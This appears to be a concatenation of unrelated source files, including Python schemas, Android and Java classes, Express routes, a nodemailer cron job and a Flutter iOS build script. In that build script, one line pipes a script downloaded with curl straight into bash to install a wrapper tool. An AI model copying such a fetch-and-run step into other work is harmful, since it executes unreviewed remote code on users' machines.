install_framework "${BUILT_PRODUCTS_DIR}/GoogleToolboxForMac/GoogleToolboxForMac.framework"
install_framework "${BUILT_PRODUCTS_DIR}/MDFInternationalization/MDFInternationalization.framework"
install_framework "${BUILT_PRODUCTS_DIR}/MDFTextAccessibility/MDFTextAccessibility.framework"
install_framework "${BUILT_PRODUCTS_DIR}/MaterialComponents/MaterialComponents.framework"
install_framework "${BUILT_PRODUCTS_DIR}/MotionAnimator/MotionAnimator.framework"
install_framework "${BUILT_PRODUCTS_DIR}/MotionInterchange/MotionInterchange.framework"
install_framework "${BUILT_PRODUCTS_DIR}/MotionTransitioning/MotionTransitioning.framework"
install_framework "${BUILT_PRODUCTS_DIR}/Protobuf/Protobuf.framework"
install_framework "${BUILT_PRODUCTS_DIR}/gRPC/GRPCClient.framework"
install_framework "${BUILT_PRODUCTS_DIR}/gRPC-Core/grpc.framework"
install_framework "${BUILT_PRODUCTS_DIR}/gRPC-ProtoRPC/ProtoRPC.framework"
install_framework "${BUILT_PRODUCTS_DIR}/gRPC-RxLibrary/RxLibrary.framework"
install_framework "${BUILT_PRODUCTS_DIR}/leveldb-library/leveldb.framework"
install_framework "${BUILT_PRODUCTS_DIR}/nanopb/nanopb.framework"
fi
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
wait
fi
|
<filename>packages/webdriverio/src/commands/browser/mockRestoreAll.ts
import logger from '@wdio/logger'
import { SESSION_MOCKS } from './mock'
const log = logger('webdriverio:mockRestoreAll')
/**
* Restores all mock information and behavior stored in all registered
* mocks of the session.
*
* <example>
:mockRestoreAll.js
it('should restore all mocks', async () => {
const googleMock = await browser.mock('https://google.com/')
googleMock.respond('https://webdriver.io')
const wdioMock = await browser.mock('https://webdriver.io')
wdioMock.respond('http://json.org')
await browser.url('https://google.com/')
console.log(await browser.getTitle()) // JSON
await browser.mockRestoreAll()
await browser.url('https://google.com/')
console.log(await browser.getTitle()) // Google
})
* </example>
*
* @alias browser.mockRestoreAll
*/
export default async function mockRestoreAll () {
for (const [handle, mocks] of Object.entries(SESSION_MOCKS)) {
log.trace(`Clearing mocks for ${handle}`)
for (const mock of mocks) {
mock.restore()
}
}
}
|
#!/bin/bash
dieharder -d 204 -g 6 -S 3969263179
|
<reponame>guzman-raphael/Li-Daie-2015-2016<filename>pipeline/lab.py
import datajoint as dj
from . import get_schema_name
schema = dj.schema(get_schema_name('lab'))
@schema
class Person(dj.Manual):
definition = """
username : varchar(24)
----
fullname : varchar(255)
"""
@schema
class Rig(dj.Manual):
definition = """
rig : varchar(24)
---
room : varchar(20) # example 2w.342
rig_description : varchar(1024)
"""
@schema
class Species(dj.Lookup):
definition = """
species: varchar(24)
"""
contents = zip(['Mus musculus'])
@schema
class AnimalStrain(dj.Lookup):
definition = """
animal_strain : varchar(30)
"""
contents = zip(['pl56', 'kj18'])
@schema
class AnimalSource(dj.Lookup):
definition = """
animal_source : varchar(30)
"""
contents = zip(['Jackson Labs', 'Allen Institute', 'Charles River', 'MMRRC', 'Taconic', 'Other'])
@schema
class ModifiedGene(dj.Manual):
definition = """
gene_modification : varchar(60)
---
gene_modification_description = '' : varchar(256)
"""
@schema
class Subject(dj.Manual):
definition = """
subject_id : int # institution 6 digit animal ID
---
-> [nullable] Person # person responsible for the animal
cage_number=null : int # institution 6 digit animal ID
date_of_birth=null : date # format: yyyy-mm-dd
sex : enum('M','F','Unknown')
-> Species
-> [nullable] AnimalSource # where was the animal ordered from
"""
class Strain(dj.Part):
definition = """
# Subject gene modifications
-> master
-> AnimalStrain
"""
class GeneModification(dj.Part):
definition = """
# Subject gene modifications
-> master
-> ModifiedGene
---
zygosity = 'Unknown' : enum('Het', 'Hom', 'Unknown')
type = 'Unknown' : enum('Knock-in', 'Transgene', 'Unknown')
"""
@schema
class CompleteGenotype(dj.Computed):
# should be computed
definition = """
-> Subject
---
complete_genotype : varchar(1000)
"""
def make(self, key):
pass
@schema
class WaterRestriction(dj.Manual):
definition = """
-> Subject
---
water_restriction_number : varchar(16) # WR number
cage_number : int
wr_start_date : date
wr_start_weight : Decimal(6,3)
"""
@schema
class VirusSource(dj.Lookup):
definition = """
virus_source : varchar(60)
"""
contents = zip(['Janelia core', 'UPenn', 'Addgene', 'UNC', 'Other'])
@schema
class SkullReference(dj.Lookup):
definition = """
skull_reference : varchar(60)
"""
contents = zip(['Bregma', 'Lambda'])
@schema
class BrainArea(dj.Lookup):
definition = """
brain_area: varchar(32)
---
description = null : varchar (4000) # name of the brain area
"""
contents = [('ALM', 'anterior lateral motor cortex'),
('M2', 'secondary motor cortex'),
('PONS', 'pontine nucleus'),
('vS1', 'vibrissal primary somatosensory cortex ("barrel cortex")'),
('Thalamus', 'Thalamus'),
('Medulla', 'Medulla'),
('Striatum', 'Striatum')]
@schema
class Hemisphere(dj.Lookup):
definition = """
hemisphere: varchar(32)
"""
contents = zip(['left', 'right', 'both'])
@schema
class ProbeType(dj.Lookup):
definition = """
probe_type: varchar(32)
"""
contents = zip(['nn_silicon_probe', 'tetrode_array', 'neuropixel'])
@schema
class Probe(dj.Lookup):
definition = """ # represent a physical probe
probe: varchar(32) # unique identifier for this model of probe (e.g. part number)
---
-> ProbeType
probe_comment='' : varchar(1000)
"""
class Electrode(dj.Part):
definition = """
-> master
electrode: int # electrode
---
x_coord=NULL: float # (um) x coordinate of the electrode within the probe
y_coord=NULL: float # (um) y coordinate of the electrode within the probe
z_coord=NULL: float # (um) z coordinate of the electrode within the probe
"""
@schema
class ElectrodeConfig(dj.Lookup):
definition = """
-> Probe
electrode_config_name: varchar(16) # user friendly name
---
electrode_config_hash: varchar(36) # hash of the group and group_member (ensure uniqueness)
unique index (electrode_config_hash)
"""
class ElectrodeGroup(dj.Part):
definition = """
# grouping of electrodes to be clustered together (e.g. a neuropixel electrode config - 384/960)
-> master
electrode_group: int # electrode group
"""
class Electrode(dj.Part):
definition = """
-> master.ElectrodeGroup
-> Probe.Electrode
"""
@schema
class PhotostimDevice(dj.Lookup):
definition = """
photostim_device : varchar(20)
---
excitation_wavelength : decimal(5,1) # (nm)
photostim_device_description : varchar(255)
"""
contents = [('LaserGem473', 473, 'Laser (Laser Quantum, Gem 473)'),
('LaserCoboltMambo100', 594, 'Laser (Laser Quantum, Gem 473)'),
('LED470', 470, 'LED (Thor Labs, M470F3 - 470 nm, 17.2 mW (Min) Fiber-Coupled LED)'),
('OBIS470', 473, 'OBIS 473nm LX 50mW Laser System: Fiber Pigtail (Coherent Inc)')]
|
package com.NumCo.numberconverter.Cipher.CipherFragments;
import android.content.Context;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.ListView;
import androidx.fragment.app.Fragment;
import androidx.fragment.app.FragmentActivity;
import com.NumCo.numberconverter.Cipher.CipherAdapters.HelpListAdapter;
import com.NumCo.numberconverter.Cipher.Commands;
import com.NumCo.numberconverter.Cipher.Store;
import com.NumCo.numberconverter.ObjectPainter.Status;
import com.NumCo.numberconverter.R;
import java.util.ArrayList;
public class HelpFragment extends Fragment {
private ListView listView;
@Override
public View onCreateView(LayoutInflater inflater, ViewGroup container,
Bundle savedInstanceState) {
View view = inflater.inflate(R.layout.fragment_cipher_help, container, false);
listView = view.findViewById(R.id.cipherHelpFirstListView);
listView.setAdapter(getAdapter(requireActivity()));
return view;
}
private HelpListAdapter getAdapter(FragmentActivity activity) {
SharedPreferences sharedPreferences = activity.getSharedPreferences("saved-options", Context.MODE_PRIVATE);
String selectedOutput = sharedPreferences.getString("output", "HEX");
String selectedInput = sharedPreferences.getString("input", "DEC");
ArrayList<Store.ImageGenerator> imageData = new ArrayList<>();
if (!selectedInput.equals(selectedOutput)) {
imageData.add(new Store.ImageGenerator(selectedInput,
Commands.getHelpImageCommands(selectedInput, Status.INPUT.color), Status.INPUT));
imageData.add(new Store.ImageGenerator(selectedOutput,
Commands.getHelpImageCommands(selectedOutput, Status.OUTPUT.color), Status.OUTPUT));
} else {
imageData.add(new Store.ImageGenerator(selectedInput,
Commands.getHelpImageCommands(selectedInput, Status.ERROR.color), Status.ERROR));
}
for (String id : Commands.helpImageIds) {
if (!id.equals(selectedOutput) && !id.equals(selectedInput)) {
Status status = id.equals("CIPHER") ? Status.NORMAL : Status.DISABLED;
imageData.add(new Store.ImageGenerator(id,
Commands.getHelpImageCommands(id, status.color), status));
}
}
return new HelpListAdapter(activity, imageData);
}
} |
<gh_stars>0
package com.zhcs.entity;
import java.io.Serializable;
import java.math.BigDecimal;
import java.util.Date;
//*****************************************************************************
/**
* <p>Title:IllegaEntity</p>
* <p>Description: 违章管理</p>
* <p>Copyright: Copyright (c) 2017</p>
* <p>Company: 深圳市智慧城市管家信息科技有限公司 </p>
* @author 刘晓东 - Alter
* @version v1.0 2017年2月23日
*/
//*****************************************************************************
public class IllegaEntity implements Serializable {
private static final long serialVersionUID = 1L;
//主键id
private Long id;
//车牌号(关联到车辆表)
private Long cno;
//车牌号(真正的车牌号)
private String cnoText;
//违章日期
private Date illtm;
//违章原因
private Long cause;
//违章原因
private String causeName;
//违章人员
private Long person;
//违章人员姓名
private String personName;
//处罚金额
private BigDecimal amount;
//扣分
private int score;
//违章地点
private String addr;
//处罚单位
private String unit;
//状态
private String status;
//创建人员
private Long crtid;
//创建时间
private Date crttm;
//修改人员
private Long updid;
//修改时间
private Date updtm;
/**
* 设置:主键id
*/
public void setId(Long id) {
this.id = id;
}
/**
* 获取:主键id
*/
public Long getId() {
return id;
}
/**
* 设置:车牌号(关联到车辆表)
*/
public void setCno(Long cno) {
this.cno = cno;
}
/**
* 获取:车牌号(关联到车辆表)
*/
public Long getCno() {
return cno;
}
/**
* 设置:违章日期
*/
public void setIlltm(Date illtm) {
this.illtm = illtm;
}
/**
* 获取:违章日期
*/
public Date getIlltm() {
return illtm;
}
/**
* 设置:违章原因
*/
public void setCause(Long cause) {
this.cause = cause;
}
/**
* 获取:违章原因
*/
public Long getCause() {
return cause;
}
/**
* 设置:违章人员
*/
public void setPerson(Long person) {
this.person = person;
}
/**
* 获取:违章人员
*/
public Long getPerson() {
return person;
}
/**
* 设置:处罚金额
*/
public void setAmount(BigDecimal amount) {
this.amount = amount;
}
/**
* 获取:处罚金额
*/
public BigDecimal getAmount() {
return amount;
}
/**
* 设置:违章地点
*/
public void setAddr(String addr) {
this.addr = addr;
}
/**
* 获取:违章地点
*/
public String getAddr() {
return addr;
}
/**
* 设置:处罚单位
*/
public void setUnit(String unit) {
this.unit = unit;
}
/**
* 获取:处罚单位
*/
public String getUnit() {
return unit;
}
/**
* 设置:状态
*/
public void setStatus(String status) {
this.status = status;
}
/**
* 获取:状态
*/
public String getStatus() {
return status;
}
/**
* 设置:创建人员
*/
public void setCrtid(Long crtid) {
this.crtid = crtid;
}
/**
* 获取:创建人员
*/
public Long getCrtid() {
return crtid;
}
/**
* 设置:创建时间
*/
public void setCrttm(Date crttm) {
this.crttm = crttm;
}
/**
* 获取:创建时间
*/
public Date getCrttm() {
return crttm;
}
/**
* 设置:修改人员
*/
public void setUpdid(Long updid) {
this.updid = updid;
}
/**
* 获取:修改人员
*/
public Long getUpdid() {
return updid;
}
/**
* 设置:修改时间
*/
public void setUpdtm(Date updtm) {
this.updtm = updtm;
}
/**
* 获取:修改时间
*/
public Date getUpdtm() {
return updtm;
}
/**
* 获取:车牌号(真正的车牌号)
*/
public String getCnoText() {
return cnoText;
}
/**
* 设置:车牌号(真正的车牌号)
*/
public void setCnoText(String cnoText) {
this.cnoText = cnoText;
}
/**
* 获取:违章人员姓名
*/
public String getPersonName() {
return personName;
}
/**
* 设置:违章人员姓名
*/
public void setPersonName(String personName) {
this.personName = personName;
}
public String getCauseName() {
return causeName;
}
public void setCauseName(String causeName) {
this.causeName = causeName;
}
public int getScore() {
return score;
}
public void setScore(int score) {
this.score = score;
}
}
|
package com.codexiaosheng.weatherp;
import android.app.ProgressDialog;
import android.content.Intent;
import android.os.Bundle;
import android.os.Handler;
import android.os.Message;
import android.support.annotation.Nullable;
import android.support.v4.app.Fragment;
import android.text.TextUtils;
import android.util.Log;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.AdapterView;
import android.widget.ArrayAdapter;
import android.widget.Button;
import android.widget.ListView;
import android.widget.TextView;
import com.codexiaosheng.weatherp.bean.ProvinceCityCountyBean;
import com.codexiaosheng.weatherp.constant.Constant;
import com.codexiaosheng.weatherp.db.CityBean;
import com.codexiaosheng.weatherp.db.CountyBean;
import com.codexiaosheng.weatherp.db.ProvinceBean;
import com.codexiaosheng.weatherp.util.Util;
import com.google.gson.Gson;
import com.google.gson.reflect.TypeToken;
import org.litepal.crud.DataSupport;
import java.util.ArrayList;
import java.util.List;
import static com.codexiaosheng.weatherp.constant.Constant.LEVEL_CITY;
import static com.codexiaosheng.weatherp.constant.Constant.LEVEL_COUNTY;
import static com.codexiaosheng.weatherp.constant.Constant.LEVEL_PROVINCE;
/**
* Description:展示省市区
* <p>
* Created by code-xiaosheng on 2017/8/2.
*/
public class ChooseAreaFragment extends Fragment {
private Button btnBack;
private TextView tvTitle;
private ListView lvView;
private ArrayAdapter<String> adapter;
private List<String> datas = new ArrayList<>();
// 当前选中的级别
private int currentLevel;
private ProvinceBean selectProvince; // 选中的省份
private CityBean selectCity; // 选中的市
private ProgressDialog progressDialog;
// 省市县集合
private List<ProvinceCityCountyBean> pccList = new ArrayList<>();
private List<ProvinceBean> provinceList = new ArrayList<>();
private List<CityBean> cityList = new ArrayList<>();
private List<CountyBean> countyList = new ArrayList<>();
@Nullable
@Override
public View onCreateView(LayoutInflater inflater, @Nullable ViewGroup container,
@Nullable Bundle savedInstanceState) {
View view = inflater.inflate(R.layout.choose_area, container, false);
btnBack = (Button) view.findViewById(R.id.btn_back);
tvTitle = (TextView) view.findViewById(R.id.tv_title);
lvView = (ListView) view.findViewById(R.id.lv_view);
adapter = new ArrayAdapter<String>(getContext(),
android.R.layout.simple_expandable_list_item_1, datas);
lvView.setAdapter(adapter);
return view;
}
@Override
public void onActivityCreated(@Nullable Bundle savedInstanceState) {
super.onActivityCreated(savedInstanceState);
lvView.setOnItemClickListener(new AdapterView.OnItemClickListener() {
@Override
public void onItemClick(AdapterView<?> parent, View view, int position, long id) {
if (currentLevel == LEVEL_PROVINCE) {
selectProvince = provinceList.get(position);
queryCities();
} else if (currentLevel == LEVEL_CITY) {
selectCity = cityList.get(position);
queryCounties();
} else if (currentLevel == LEVEL_COUNTY) {
String cityName = countyList.get(position).getName();
if (getActivity() instanceof MainActivity) {
Intent intent = new Intent(getActivity(), WeatherActivity.class);
intent.putExtra("city_name", cityName);
startActivity(intent);
getActivity().finish();
} else if (getActivity() instanceof WeatherActivity) {
WeatherActivity activity = (WeatherActivity) getActivity();
activity.drawerLayout.closeDrawers();
activity.refreshLayout.setRefreshing(true);
activity.cityNames = cityName;
activity.requestWeatherData(cityName);
}
}
}
});
btnBack.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
if (currentLevel == LEVEL_CITY) {
queryDatas();
} else if (currentLevel == LEVEL_COUNTY) {
queryCities();
}
}
});
queryDatas();
}
/**
* 查询区/县级别数据
*/
private void queryCounties() {
tvTitle.setText(selectCity.getName());
btnBack.setVisibility(View.VISIBLE);
showProgressDialog();
countyList = DataSupport.where("cid = ?",
String.valueOf(selectCity.getCid())).find(CountyBean.class);
if (countyList.size() > 0) {
datas.clear();
for (CountyBean county :
countyList) {
datas.add(county.getName());
}
closeProgressDialog();
adapter.notifyDataSetChanged();
// lvView.setSelection(0);
currentLevel = Constant.LEVEL_COUNTY;
}
}
/**
* 查询市级别数据
*/
private void queryCities() {
tvTitle.setText(selectProvince.getName());
btnBack.setVisibility(View.VISIBLE);
showProgressDialog();
cityList = DataSupport.where("provinceid = ?",
String.valueOf(selectProvince.getPid())).find(CityBean.class);
if (cityList.size() > 0) {
datas.clear();
for (CityBean city : cityList) {
datas.add(city.getName());
}
closeProgressDialog();
adapter.notifyDataSetChanged();
lvView.setSelection(0);
currentLevel = Constant.LEVEL_CITY;
}
}
/**
* 查询所有省级数据,顺序,先查数据库,再从服务器获取
*/
private void queryDatas() {
tvTitle.setText("中国");
btnBack.setVisibility(View.GONE);
showProgressDialog();
provinceList = DataSupport.findAll(ProvinceBean.class);
if (provinceList.size() > 0) {
datas.clear();
for (ProvinceBean province : provinceList) {
datas.add(province.getName());
}
closeProgressDialog();
adapter.notifyDataSetChanged();
lvView.setSelection(0);
currentLevel = Constant.LEVEL_PROVINCE;
} else {
queryFromServer();
}
}
private Handler handler = new Handler() {
@Override
public void handleMessage(Message msg) {
super.handleMessage(msg);
closeProgressDialog();
int type = msg.what;
switch (type) {
case 10:
Log.e("ChooseAreaFragment", "handleMessage: Province->" + provinceList.size());
queryDatas();
break;
case 20:
Log.e("ChooseAreaFragment", "handleMessage: City->" + cityList.size());
break;
case 30:
Log.e("ChooseAreaFragment", "handleMessage: County->" + countyList.size());
break;
}
}
};
/**
* 从本地解析json保存数据
*/
private void queryFromServer() {
new Thread(new Runnable() {
@Override
public void run() {
String json = Util.getDataFromAssets(getActivity());
if (!TextUtils.isEmpty(json)) {
Gson gson = new Gson();
pccList = gson.fromJson(json, new TypeToken<List<ProvinceCityCountyBean>>() {
}.getType());
if (pccList.size() > 0) {
for (int i = 0; i < pccList.size(); i++) {
ProvinceCityCountyBean bean = pccList.get(i);
ProvinceBean province = new ProvinceBean();
province.setName(bean.getName());
province.setId(Integer.parseInt(bean.getId()));
province.setPid(Integer.parseInt(bean.getId()));
provinceList.add(province);
province.save();
if (i == pccList.size() - 1) {
handler.sendEmptyMessage(10);
}
List<ProvinceCityCountyBean.CityListBeanX> cList = bean.getCityList();
for (int j = 0; j < cList.size(); j++) {
ProvinceCityCountyBean.CityListBeanX cBean = cList.get(j);
CityBean city = new CityBean();
city.setName(cBean.getName());
city.setId(Integer.parseInt(cBean.getId()));
city.setProvinceid(Integer.parseInt(bean.getId()));
city.setCid(Integer.parseInt(cBean.getId()));
city.save();
cityList.add(city);
if (i == pccList.size() - 1 && j == cList.size() - 1) {
handler.sendEmptyMessage(20);
Log.e("city id", "run: " + cBean.getId() + "--" + city.getId());
}
List<ProvinceCityCountyBean.CityListBeanX.CityListBean> countyL =
cBean.getCityList();
for (int k = 0; k < countyL.size(); k++) {
ProvinceCityCountyBean.CityListBeanX.CityListBean countB =
countyL.get(k);
CountyBean county = new CountyBean();
county.setId(Integer.parseInt(countB.getId()));
county.setCountyid(Integer.parseInt(countB.getId()));
county.setName(countB.getName());
county.setCid(Integer.parseInt(cBean.getId()));
county.save();
countyList.add(county);
if (i == pccList.size() - 1 && j == cList.size() - 1 && k == countyL.size() - 1) {
handler.sendEmptyMessage(30);
}
}
}
}
}
}
}
}).start();
}
/**
* 加载框
*/
private void showProgressDialog() {
if (progressDialog == null) {
progressDialog = new ProgressDialog(getActivity());
progressDialog.setMessage("正在加载中...");
progressDialog.setCanceledOnTouchOutside(false);
}
progressDialog.show();
}
/**
* 关闭加载框
*/
private void closeProgressDialog() {
if (progressDialog != null) {
progressDialog.dismiss();
}
}
}
|
<filename>src/routes/login.js<gh_stars>0
const express = require('express')
const jwt = require('jsonwebtoken')
const { hasBodyParams } = require('../middleware/validation')
const checkExistingUser = require('../middleware/check-existing-user')
const validateAccess = require('../middleware/validate-access')
const router = express.Router()
module.exports = (db) => {
router.post(
'/',
hasBodyParams('device_id', 'app_name', 'access_key'),
validateAccess(db),
checkExistingUser(db),
(req, res) => {
const { device_id } = req.body
const { user_id } = req
const token = jwt.sign({ device_id }, process.env.AUTH_PRIVATE_KEY, { expiresIn: '30d' })
// TODO: checkin with Eugene on mobile app logout for ttl
// timestamp every login
db.query(
`
INSERT INTO login (user_id) VALUES ($1)
`,
[user_id],
)
.then(() => res.status(200).json({ token }))
.catch(err => res.status(500).json({ message: err.message }))
},
)
return router
}
|
<filename>tutos/specs/signup.js
import { goTo } from './helpers'
export default function(spec) {
spec.beforeEach(function() {
// This will run before each test in this spec file.
});
spec.describe('Signing up', function() {
// spec.it('works', async function() {
// const navigation = await spec.findComponent('AppNavigation')
// // await spec.exists('Index');
// await goTo(navigation, 'signup');
// await spec.exists('SignUp');
// // await spec.fillIn('SignupScreen.Username', 'Cavy1');
// // await spec.fillIn('SignupScreen.FirstName', 'Cavy');
// // await spec.fillIn('SignupScreen.LastName', 'Test');
// // await spec.fillIn('SignupScreen.Email', '<EMAIL>');
// // await spec.fillIn('SignupScreen.Password', '<PASSWORD>');
// // await spec.fillIn('SignupScreen.PasswordConfirm', '<PASSWORD>');
// // await spec.press('SignupScreen.Button');
// // await spec.exists('Home');
// });
});
} |
#!/bin/bash
#
# Copyright 2019 Delphix
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# shellcheck disable=SC2034
DEFAULT_PACKAGE_GIT_URL="https://github.com/delphix/makedumpfile.git"
# Note: we get the package version programatically in our build() hook
UPSTREAM_SOURCE_PACKAGE="makedumpfile"
function prepare() {
logmust install_build_deps_from_control_file
}
function build() {
logmust cd "$WORKDIR/repo"
if [[ -z "$PACKAGE_VERSION" ]]; then
logmust eval PACKAGE_VERSION="1:$(grep '^VERSION=' Makefile | cut -d "=" -f 2)"
fi
logmust dpkg_buildpackage_default
}
function update_upstream() {
logmust update_upstream_from_source_package
}
|
const nodemailer = require('nodemailer');
// Set up transporter
const transporter = nodemailer.createTransport({
host: 'smtp.example.com',
port: 587,
auth: {
user: 'user@example.com',
pass: 'password'
}
});
// Set up message
const message = {
from: 'sender@example.com',
to: 'recipient@example.com',
subject: 'Daily Newsletter',
text: 'This is a daily newsletter for subscribers!'
};
// Send message
const job = cron.schedule('00 00 08 * * *', () => {
transporter.sendMail(message, (err, info) => {
if (err) {
console.error(err);
} else {
console.log(info);
}
});
});
// Start job
job.start(); |
#! /bin/bash
BUILD_MODE="debug"
ARCHS_ARM="arm64,armv7"
FLUTTER_ROOT=".flutter"
PRODUCT_DIR="product"
PRODUCT_ZIP="product.zip"
BUILD_PATH=".build_ios/${BUILD_MODE}"
PRODUCT_PATH="${BUILD_PATH}/${PRODUCT_DIR}"
PRODUCT_APP_PATH="${PRODUCT_PATH}/Flutter"
# git repository path
PRODUCT_GIT_DIR="/xx/xx/x"
usage() {
echo
echo "build_ios.sh [-h | [-m <build_mode>] [-s]]"
echo ""
echo "-h - Help."
echo "-m - Build model, valid values are 'debug', 'profile', or 'release'. "
echo " Default values: 'debug'."
echo ""
echo "Build product in 'build_ios/<builde_model>/${PRODUCT_DIR}' directory."
echo
}
EchoError() {
echo "$@" 1>&2
}
flutter_get_packages() {
echo "================================="
echo "Start get flutter app plugin"
local flutter_wrapper="./flutterw"
if [ -e $flutter_wrapper ]; then
echo 'flutterw installed' >/dev/null
else
bash -c "$(curl -fsSL https://raw.githubusercontent.com/passsy/flutter_wrapper/master/install.sh)"
if [[ $? -ne 0 ]]; then
EchoError "Failed to installed flutter_wrapper."
exit -1
fi
fi
${flutter_wrapper} packages get --verbose
if [[ $? -ne 0 ]]; then
EchoError "Failed to install flutter plugins."
exit -1
fi
echo "Finish get flutter app plugin"
}
build_flutter_app() {
echo "================================="
echo "Start Build flutter app"
echo "Build mode: ${BUILD_MODE}"
mkdir -p -- "${PRODUCT_APP_PATH}"
local target_path="lib/main.dart"
local artifact_variant="unknown"
case "$BUILD_MODE" in
release*)
artifact_variant="ios-release"
;;
profile*)
artifact_variant="ios-profile"
;;
debug*)
artifact_variant="ios"
;;
*)
EchoError "========================================================================"
EchoError "ERROR: Unknown FLUTTER_BUILD_MODE: ${BUILD_MODE}."
EchoError "Valid values are 'debug', 'profile', or 'release'."
EchoError "This is controlled by the -m environment varaible."
EchoError "========================================================================"
exit -1
;;
esac
if [[ "${BUILD_MODE}" != "debug" ]]; then
if [[ $ARCHS_ARM =~ .*i386.* || $ARCHS_ARM =~ .*x86_64.* ]]; then
EchoError "========================================================================"
EchoError "ERROR: Flutter does not support running in profile or release mode on"
EchoError "the Simulator (this build was: '$BUILD_MODE')."
EchoError "mode by setting '-m debug'"
EchoError "========================================================================"
exit -1
fi
echo "Build archs: ${ARCHS_ARM}"
# build fLutter app
${FLUTTER_ROOT}/bin/flutter --suppress-analytics \
--verbose \
build aot \
--output-dir="${BUILD_PATH}" \
--target-platform=ios \
--target="${target_path}" \
--${BUILD_MODE} \
--ios-arch="${ARCHS_ARM}"
if [[ $? -ne 0 ]]; then
EchoError "Failed to build flutter app"
exit -1
fi
else
echo "Build archs: x86_64 ${ARCHS_ARM}"
local app_framework_debug="iOSApp/Debug/App.framework"
cp -r -- "${app_framework_debug}" "${BUILD_PATH}"
fi
app_plist_path=".ios/Flutter/AppFrameworkInfo.plist"
cp -- "${app_plist_path}" "${BUILD_PATH}/App.framework/Info.plist"
# copy flutter sdk
local framework_path="${FLUTTER_ROOT}/bin/cache/artifacts/engine/${artifact_variant}"
local flutter_framework="${framework_path}/Flutter.framework"
local flutter_podspec="${framework_path}/Flutter.podspec"
cp -r -- "${BUILD_PATH}/App.framework" "${PRODUCT_APP_PATH}"
cp -r -- "${flutter_framework}" "${PRODUCT_APP_PATH}"
cp -r -- "${flutter_podspec}" "${PRODUCT_APP_PATH}"
local precompilation_flag=""
if [[ "$BUILD_MODE" != "debug" ]]; then
precompilation_flag="--precompiled"
fi
# build bundle
${FLUTTER_ROOT}/bin/flutter --suppress-analytics \
--verbose \
build bundle \
--target-platform=ios \
--target="${target_path}" \
--${BUILD_MODE} \
--depfile="${BUILD_PATH}/snapshot_blob.bin.d" \
--asset-dir="${BUILD_PATH}/flutter_assets" \
${precompilation_flag}
if [[ $? -ne 0 ]]; then
EchoError "Failed to build flutter assets"
exit -1
fi
cp -rf -- "${BUILD_PATH}/flutter_assets" "${PRODUCT_APP_PATH}/App.framework"
# setting podspec
# replace:
# 'Flutter.framework'
# to:
# 'Flutter.framework', 'App.framework'
sed -i '' -e $'s/\'Flutter.framework\'/\'Flutter.framework\', \'App.framework\'/g' ${PRODUCT_APP_PATH}/Flutter.podspec
echo "Finish build flutter app"
}
flutter_copy_packages() {
echo "================================="
echo "Start copy flutter app plugin"
local flutter_plugin_registrant="FlutterPluginRegistrant"
local flutter_plugin_registrant_path=".ios/Flutter/${flutter_plugin_registrant}"
echo "copy 'flutter_plugin_registrant' from '${flutter_plugin_registrant_path}' to '${PRODUCT_PATH}/${flutter_plugin_registrant}'"
cp -rf -- "${flutter_plugin_registrant_path}" "${PRODUCT_PATH}/${flutter_plugin_registrant}"
local flutter_plugin=".flutter-plugins"
if [ -e $flutter_plugin ]; then
OLD_IFS="$IFS"
IFS="="
cat ${flutter_plugin} | while read plugin; do
local plugin_info=($plugin)
local plugin_name=${plugin_info[0]}
local plugin_path=${plugin_info[1]}
if [ -e ${plugin_path} ]; then
local plugin_path_ios="${plugin_path}ios"
if [ -e ${plugin_path_ios} ]; then
if [ -s ${plugin_path_ios} ]; then
echo "copy plugin 'plugin_name' from '${plugin_path_ios}' to '${PRODUCT_PATH}/${plugin_name}'"
cp -rf ${plugin_path_ios} "${PRODUCT_PATH}/${plugin_name}"
fi
fi
fi
done
IFS="$OLD_IFS"
fi
echo "Finish copy flutter app plugin"
}
upload_product() {
echo "================================="
echo "upload product"
echo "${PRODUCT_PATH}"
echo "${PRODUCT_GIT_DIR}"
cp -r -f -- "${PRODUCT_PATH}/" "${PRODUCT_GIT_DIR}"
local app_version=$(./get_version.sh)
pushd ${PRODUCT_GIT_DIR}
git add .
git commit -m "Flutter product ${app_version}"
git push
popd
}
start_build() {
rm -rf ${BUILD_PATH}
flutter_get_packages
build_flutter_app
flutter_copy_packages
if [[ "${BUILD_MODE}" == "release" ]]; then
upload_product
fi
echo ""
echo "done!"
}
show_help=0
while getopts "m:sh" arg; do
case $arg in
m)
BUILD_MODE="$OPTARG"
;;
h)
show_help=1
;;
?)
show_help=1
;;
esac
done
if [ $show_help == 1 ]; then
usage
exit 0
fi
BUILD_PATH=".build_ios/${BUILD_MODE}"
PRODUCT_PATH="${BUILD_PATH}/${PRODUCT_DIR}"
PRODUCT_APP_PATH="${PRODUCT_PATH}/Flutter"
start_build
exit 0
|
#!/bin/sh
#
# Silence errors from Xvfb because we are starting it in non-priveleged mode.
#
Xvfb :99 -screen 0 1280x1024x24 > /dev/null 2>&1 &
exec "$@"
|
#!/usr/bin/env bash
set -e
if [ -z "$KO_DOCKER_REPO" ]
then
echo "Please set \$KO_DOCKER_REPO."
exit 1
fi
if [ -z "$IMAGE_TAG" ]
then
echo "\$IMAGE_TAG is empty, setting to latest."
IMAGE_TAG="latest"
fi
ko publish -B -t $IMAGE_TAG --insecure-registry=true ./bot-go
echo $IMAGE |
#!/bin/basg
####################
# Author - Robert E. Novak aka REN
# sailnfool@gmail.com
# skype:sailnfool.ren
#_____________________________________________________________________
# Rev.|Auth.| Date | Notes
#_____________________________________________________________________
# 1.0 | REN |02/08/2022| testing nice2num
#_____________________________________________________________________
#
########################################################################
source func.nice2num
source func.errecho
TESTNAME="Test of function nice2num (func.nice2num) from\n\thttps://github.com/sailnfool/func"
USAGE="\r\n${0##*/} [-[hv]]\r\n
\t\tVerifies that the __kbytesvalue and __kbibytesvalue arrays have\r\n
\t\tcorrectly initialized. Normally emits only PASS|FAIL message\r\n
\t-h\t\tPrint this message\r\n
\t-v\t\tVerbose mode to show values\r\n
"
optionargs="hv"
verbose_mode="FALSE"
